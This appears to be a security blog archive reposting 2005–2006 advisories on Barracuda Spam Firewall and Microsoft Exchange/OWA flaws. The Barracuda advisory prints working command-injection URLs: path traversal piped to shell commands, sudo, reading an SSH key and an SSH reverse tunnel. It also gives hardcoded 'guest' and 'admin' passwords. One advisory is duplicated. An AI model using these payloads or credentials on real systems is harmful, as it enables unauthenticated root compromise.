Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006

Summary:

Lack of input sanitisation in the Barracuda spam firewall
web interface allows execution of commands by unauthenticated users.
Combined with priviledge elevation techniques, execution of commands as
the root user is possible allowing a full system compromise.

Details:

In a follow-up investigation to bid 19276 - 'Barracuda Vulnerability:
Arbitrary File Disclosure [NNL-20060801-02]' by Greg Sinclair, further
investigation was performed by the Internet Defence Security Team and
several extra vulnerabilities were discovered, which when leveraged with
privilege escalation techniques allowed the remote execution of commands
as the root user without any authentication.

The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitation vulnerability in preview_email.cgi, e.g:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/back
up/periodic_config.txt.tmp

Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.

Using this vulnerability, it is also possible to use the pipe character
(|) to redirect the stdout of any programs run, to the stdin of the file
open function to print the output of the command back to the web
interface, e.g:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/l
s%20-la%20/|

It was then possible to leverage further privileges, as the user the
http daemon runs as (nobody), is granted root level access to several
system commands via the use of sudo, e.g:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/sudo%20touch%20/foo|

(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/').

The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(aswell as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)

Access to such commands as a chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the webinterface, without the use
of sudo, and would run with root priviledges.

As such, a complete system compromise is possible remotely through the
web interface without any authentication.

It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.

During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.

In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.

It was possible to expose the ssh rsa public key, which then could be
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/c
at%20/home/emailswitch/code/config/id_rsa.pub|

With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:loca
lhost:443%20@|

It was them possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.

It was noted that the original file input sanitation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.

So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remains the same.

Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.

The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.
Exploit
Attackers can exploit these issues via a web client.

The following proof-of-concept URI is available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl

Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.

Labels: Appliance, Email, Spam, Vulnerability

Saturday, August 26, 2006

Barracuda Spam Firewall default account

Barracuda Spam Firewall default account

gssinclannlsoftware.com
Date: Tue Aug 01 2006 - 16:18:15 CDT
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Title: Barracuda Hardcoded Password Vulnerability
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair (gssinclannlsoftware.com)
Discovered on: 28 May 2006

Overview:
Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to information disclosure which is made possible by a default guest password

Details:
The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 have a hardcoded password for the "guest" account in the Login.pm script. This script is called to validate any user who attempts to login to the barracuda's web interface (typically at http://:8080 or https://). While the guest account has limited access, the following information can be obtained:
* system configuration including IP accesses, admin IP ACLs
* email message logs (but not the content of the messages)
* version information of both spam/antivirus definitions and system firmware version

Used in conjunction with the vulnerability "Barracuda Arbitrary File Disclosure" (NNL-20060801-02), the integrity of the system can be compromised. An attacker can use both vulnerabilities to download both confidential emails as well as the configuration information (including the admin password).

Additionally, while some accounts such as "admin" are bound by user definable IP ACLs, the guest account is not. This means that sensitive information can be disclosed to ANY IP address regardless of the user defined network restrictions.

Proof of Concept:
Enter the username "guest" into the login page of any open barracuda and the password "bnadmin99"

Recommendations:
* Never allow your Barracuda web interface to be accessible from untrusted networks (especially the Internet)

* Upgrade to version 3.3.0.54 or later

Vendor Contact:
29 May 2006 - Initial Vendor Contact
24 June 2006 - Vendor replies with prospect of fix
17 July 2006 - NNL request status update, no reply
01 Aug 2006 - NNL releases vuln report, notifies vendor of release

Labels: Advisory, Appliance, Email, Spam, Vulnerability

Thursday, January 12, 2006

execution of arbitrary code when the Microsoft Execution of arbitrary code on Microsoft Exchange Server

From: NGSSoftware Insight Security Research (mark at ngssoftware . com)
Date: Tue Jan 10 2006 - 16:49:03 CST
John Heasman and Mark Litchfield of NGSSoftware have discovered a critical vulnerability affecting Microsoft Exchange. The vulnerable versions include:

Microsoft Exchange Server 5.0 Service Pack 2
Microsoft Exchange Server 5.5 Service Pack 4
Microsoft Exchange 2000 Server Pack 3 with the Post-Service Pack 3 Update Rollup of August 2004

Microsoft Exchange Server 2003 Service Pack 1 and Microsoft Exchange Server 2003 Service Pack 2 are *not* affected.

The vulnerability potentially allows execution of arbitrary code when the Microsoft Exchange Server Information Store processes a specially crafted email message.

The flaw has now been addressed and patches are available from:
http://www.microsoft.com/technet/security/Bulletin/MS06-003.mspx

NGSSoftware are going to withhold details of this flaw for three months. Full details will be published on the 10th April 2006. This three month window will allow system administrators the time needed to obtain the patch before the details are released to the general public. This reflects NGSSoftware's approach to responsible disclosure.

http://www.ngssoftware.com/disclosure.pdf

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Mark Litchfield
www.ngssoftware.com
Tel: +44 208 40 100 70
Fax: +44 208 40 100 76
Cell: +1 253 414 4749

Labels: Bug, Email, Microsoft, Vulnerability

Monday, November 28, 2005

Barracuda Spam Firewall Hashed Password Disclosure

Barracuda Spam Firewall Hashed Password Disclosure

OSVDB ID: 20879
Disclosure Date: Nov 16, 2005

Description:

Barracuda Spam Firewall contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an end user interacts with the system, which may disclose the user's encoded password in the URL. The encoded password is transmitted without the protection of SSL encryption, but would require an attacker to sniff the connection to obtain the information.

Vulnerability Classification:
Remote/Network Access Required
Cryptographic Attack
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern

Products:
Barracuda Networks Barracuda Spam Firewall 3.1.17

Solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

External References:
Related OSVDB ID: 20878
Vendor: Barracuda Networks
Other Advisory URL: http://osvdb.org/ref/20/20879-barracuda.txt

Credit:
security curmudgeon - attrition.org

Labels: Advisory, Appliance, Email, Spam, Vulnerability

Saturday, October 29, 2005

HTML Code Injection in Outlook Web Access

SEC-CONSULT Security Advisory < 20060613-0 >
=======================================================================
title: HTML Code Injection in Outlook Web Access
program: Outlook Web Access
vulnerable version: Exchange 2000 (SP3), 2003 (SP1), 2003 (SP2)
impact: severe
homepage: http://www.microsoft.com/exchange/default.mspx
found: 2005-10-25
by: D. Fabian / SEC-CONSULT / www.sec-consult.com
T. Kerbl / SEC-CONSULT / www.sec-consult.com
=======================================================================

vendor description:
---------------

Microsoft Office Outlook Web Access is an integrated component of
Exchange Server 2000/2003. By using only a Web browser and an Internet
or intranet connection, Outlook Web Access enables users to read their
corporate e-mail messages, schedules, and other information that is
stored on a server running Exchange.

[Source: http://www.microsoft.com/exchange/evaluation/features/
owa2k3_55.mspx]

vulnerability overview:
---------------

Microsoft Outlook Web Access is vulnerable to an HTML code
injection/cross site scripting attack. A malicous user could craft a
mail containing HTML and Javascript code. Such code could be used to
steal session information from the victims cookies, and thus enable
the attacker to get access to the victim's emails.

In alternative Browsers like Mozilla Firefox or Opera the mere opening
of an crafted email is enough for Javascript code to execute. As soon
as the victim clicks on the malicious email, the Javascript code can
read session information and send this to the attacker, who can
then perform session highjacking and read the victims emails.

As Internet Explorer uses proprietary security mechanisms (mails
are displayed as pages in restricted security zone) it is not
possible to inject Javascript code directly into email bodies.
However our research showed, that using HTML attachments (which are
also subject to input sanitation in OWA), the Javascript Code can be
successfully executed. Furthermore HTML Code injection is still
possible directly in the email body. This can be used e.g. by
malicious attackers to include images which are displayed without
further user interaction and thus verify whether the user read the
email or not. Also links can be directly included, curcumventing
OWA's redirection feature.

vulnerability details:
---------------

To allow time to Microsoft Exchange administrators to patch their
systems, SEC Consult is going to withhold vulnerability and exploit
details for 2 weeks.

vulnerable versions:
---------------

The following versions of Microsoft Exchange Server are vulnerable
to the described security flaw:

- Microsoft Exchange 2000 Server Pack 3 with the August 2004
Exchange 2000 Server Post-Service Pack 3 Update Rollup
- Microsoft Exchange Server 2003 Service Pack 1
- Microsoft Exchange Server 2003 Service Pack 2

vendor status:
---------------
vendor notified: 2005-10-27
vendor response: 2005-10-27
patch available: 2006-06-13

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: office at sec-consult dot com
www.sec-consult.com

EOF Daniel Fabian / @2006
research at sec-consult dot com SEC-CONSULT Security Advisory < 20060613-0 >
=======================================================================
title: HTML Code Injection in Outlook Web Access
program: Outlook Web Access
vulnerable version: Exchange 2000 (SP3), 2003 (SP1), 2003 (SP2)
impact: severe
homepage: http://www.microsoft.com/exchange/default.mspx
found: 2005-10-25
by: D. Fabian / SEC-CONSULT / www.sec-consult.com
T. Kerbl / SEC-CONSULT / www.sec-consult.com
=======================================================================

vendor description:
---------------

Microsoft Office Outlook Web Access is an integrated component of
Exchange Server 2000/2003. By using only a Web browser and an Internet
or intranet connection, Outlook Web Access enables users to read their
corporate e-mail messages, schedules, and other information that is
stored on a server running Exchange.

[Source: http://www.microsoft.com/exchange/evaluation/features/
owa2k3_55.mspx]

vulnerability overview:
---------------

Microsoft Outlook Web Access is vulnerable to an HTML code
injection/cross site scripting attack. A malicous user could craft a
mail containing HTML and Javascript code. Such code could be used to
steal session information from the victims cookies, and thus enable
the attacker to get access to the victim's emails.

In alternative Browsers like Mozilla Firefox or Opera the mere opening
of an crafted email is enough for Javascript code to execute. As soon
as the victim clicks on the malicious email, the Javascript code can
read session information and send this to the attacker, who can
then perform session highjacking and read the victims emails.

As Internet Explorer uses proprietary security mechanisms (mails
are displayed as pages in restricted security zone) it is not
possible to inject Javascript code directly into email bodies.
However our research showed, that using HTML attachments (which are
also subject to input sanitation in OWA), the Javascript Code can be
successfully executed. Furthermore HTML Code injection is still
possible directly in the email body. This can be used e.g. by
malicious attackers to include images which are displayed without
further user interaction and thus verify whether the user read the
email or not. Also links can be directly included, curcumventing
OWA's redirection feature.

vulnerability details:
---------------

To allow time to Microsoft Exchange administrators to patch their
systems, SEC Consult is going to withhold vulnerability and exploit
details for 2 weeks.

vulnerable versions:
---------------

The following versions of Microsoft Exchange Server are vulnerable
to the described security flaw:

- Microsoft Exchange 2000 Server Pack 3 with the August 2004
Exchange 2000 Server Post-Service Pack 3 Update Rollup
- Microsoft Exchange Server 2003 Service Pack 1
- Microsoft Exchange Server 2003 Service Pack 2

vendor status:
---------------
vendor notified: 2005-10-27
vendor response: 2005-10-27
patch available: 2006-06-13

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: office at sec-consult dot com
www.sec-consult.com

EOF Daniel Fabian / @2006
research at sec-consult dot com

Labels: Advisory, Email, http, Microsoft, Vulnerability

Tuesday, October 11, 2005

Microsoft Exchange Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1015038
SecurityTracker URL: http://securitytracker.com/id?1015038
CVE Reference: CAN-2005-1987
Date: Oct 11 2005
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Advisory
Version(s): Microsoft Exchange 2000 Server SP3
Description: A vulnerability was reported in Microsoft Exchange in the Collaboration Data Objects component. A remote user can execute arbitrary code on the target system.

The Collaboration Data Objects (CDO) COM component contains a buffer overflow. A remote user can supply a specially crafted message to be processed by CDOSYS or CDOEX to trigger a buffer overflow and execute arbitrary code on the target system. SMTP can be used as an attack vector.

Microsoft Windows is also affected.

The vendor credits Gary O leary-Steele of Sec-1 with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system.
Solution: The vendor has issued the following fixes:

Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=AE0BA6D7-37AF-46E8-9E25-AB 63883FA944

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=E0DAF2D1-656C-4580- 94C1-8AB009B4AD4F

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=D389EF4D-583D-41C0-9081-844D348F3817

Mi crosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=1BC06799-B9F5-416F-8965-DC0E07A2 4A29

Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems:

http://www.microsoft.com/download s/details.aspx?FamilyId=956FFD90-60AF-4296-8765-F0A17A77DB77

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=550 4C410-CDCB-4826-B002-DBA0E3A402A4

Microsoft Exchange 2000 Server Service Pack 3 with the Exchange 2000 Post-Service Pack 3 Update Rollup of August 2004:

http://www.microsoft.com/downloads/details.aspx?FamilyId=60FD0DDC-04B7-4879-930B-53375823CD51

A restart is not required.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-048.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)

Labels: Bug, Email, Vulnerability

Thursday, April 28, 2005

Microsoft Exchange Heap Overlow in Processing Extended SMTP Verb Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1013687
SecurityTracker URL: http://securitytracker.com/id?1013687
CVE Reference: CAN-2005-0560
Date: Apr 12 2005
Impact: Execution of arbitrary code via network, Root access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Version(s): 2000 SP3, 2003, 2003 SP1
Description: A buffer overflow vulnerability was reported in Microsoft Exchange. A remote user can execute arbitrary code on the target system.

A remote user can connect to the Exchange SMTP service and supply a specially crafted extended SMTP verb to trigger a heap overflow. Arbitrary code will be executed with System privileges.

On Exchange 2003, authentication is required by default before the specific extended SMTP verb can be supplied. On Exchange 2000, no authentication is required.

The vendor credits Mark Dowd and Ben Layer of ISS X-Force with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system with System level privileges.
Solution: The vendor has issued the following fixes:

Microsoft Exchange 2000 Server Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479 -8AC9-B5544EA0BD66

Microsoft Exchange Server 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267

Microsoft Exchange Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC

A restart is not required if all applications are closed prior to installation. The security update will restart the IIS, SMTP, and the Exchange Server Information Store Service. The File Transfer Protocol (FTP) and Network News Transfer Protocol (NNTP) services will also be affected.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-021.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)

Labels: Advisory, Bug, Email, Microsoft, Vulnerability